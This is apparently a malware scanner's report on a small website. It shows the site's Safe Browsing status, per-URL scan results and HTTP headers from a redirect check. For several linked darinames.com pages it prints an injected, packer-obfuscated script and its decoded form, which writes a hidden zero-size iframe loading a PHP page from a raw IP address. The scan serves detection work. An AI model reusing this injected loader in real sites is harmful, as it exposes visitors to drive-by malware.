Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mariadelosangelesnunez.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mariadelosangelesnunez.com/ | 200 OK Content-Length: 17087 Content-Type: text/html | clean |
http://mariadelosangelesnunez.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://mariadelosangelesnunez.com/plugins/content/plugin_jw_ts/tabs_slides_comp.js | 200 OK Content-Length: 5367 Content-Type: application/javascript | clean |
http://mariadelosangelesnunez.com/plugins/content/plugin_jw_ts/tabs_slides_def_loader.js | 200 OK Content-Length: 1011 Content-Type: application/javascript | clean |
http://mariadelosangelesnunez.com/modules/mod_flashmod/mod_flashmod.js | 200 OK Content-Length: 3776 Content-Type: application/javascript | clean |
http://mariadelosangelesnunez.com/templates/newpers/jquery.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://mariadelosangelesnunez.com/templates/newpers/script.js | 200 OK Content-Length: 4901 Content-Type: application/javascript | clean |
http://darinames.com/hnq7mf8r.php?id=54082375 | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://darinames.com/ | 200 OK Content-Length: 22378 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|73||src|height|33|width|board||79|php|63|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://73.33.63.79/tag1.php"></ifee> | ||
http://darinames.com/GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 102926 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) CSStateArray = new Object; CSCookieArray = new Object; CSCookieValArray = new Object; function CSWriteCookie(action) { var name = "DFT" action[1]; var hrs = action[2]; var path = action[3]; var domain = action[4]; var secure = action[5]; var exp = new Date((new Date()).getTime() hrs * 3600000); var cookieVal = ""; for(var prop in CSCookieArray) { if(("DFT" CSCookieArray[prop]) == name) { if(cookieVal != "") cookie /*/a9a007*/ Antivirus reports:
| ||
http://darinames.com/index.php | 200 OK Content-Length: 22380 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|73||src|height|33|width|board||79|php|63|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://73.33.63.79/tag1.php"></ifee> | ||
http://darinames.com/Pages/about.html | 200 OK Content-Length: 17848 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|73||src|height|33|width|board||79|php|63|tag1|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://73.33.63.79/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://73.33.63.79/tag1.php"></ifee> | ||
http://darinames.com/Pages/../GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 102926 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) CSStateArray = new Object; CSCookieArray = new Object; CSCookieValArray = new Object; function CSWriteCookie(action) { var name = "DFT" action[1]; var hrs = action[2]; var path = action[3]; var domain = action[4]; var secure = action[5]; var exp = new Date((new Date()).getTime() hrs * 3600000); var cookieVal = ""; for(var prop in CSCookieArray) { if(("DFT" CSCookieArray[prop]) == name) { if(cookieVal != "") cookie /*/a9a007*/ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mariadelosangelesnunez.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 20 Jan 2015 10:44:28 GMT
Pragma: no-cache
Accept-Ranges: bytes
Server: Apache
Content-Length: 17087
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 20 Jan 2015 10:44:28 GMT
Host-Header: 192fc2e7e50945beb8231a492d6a8024
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fdddd9f9cb1e1d966f033f91bff30d6e=kq6k637upahlq20jabtbvvul23; path=/
X-Cache: SGCACHE-MISS
X-Forwarded-For: 78.158.11.226
X-Host: mariadelosangelesnunez.com
X-Url: /
...17087 bytes of data.
GET / HTTP/1.1
Host: mariadelosangelesnunez.com
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 20 Jan 2015 10:44:28 GMT
Pragma: no-cache
Accept-Ranges: bytes
Server: Apache
Content-Length: 17087
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 20 Jan 2015 10:44:28 GMT
Host-Header: 192fc2e7e50945beb8231a492d6a8024
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fdddd9f9cb1e1d966f033f91bff30d6e=kq6k637upahlq20jabtbvvul23; path=/
X-Cache: SGCACHE-MISS
X-Forwarded-For: 78.158.11.226
X-Host: mariadelosangelesnunez.com
X-Url: /
...17087 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mariadelosangelesnunez.com
Referer: http://www.google.com/search?q=mariadelosangelesnunez.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mariadelosangelesnunez.com
Referer: http://www.google.com/search?q=mariadelosangelesnunez.com
Result:
The result is similar to the first query. There are no suspicious redirects found.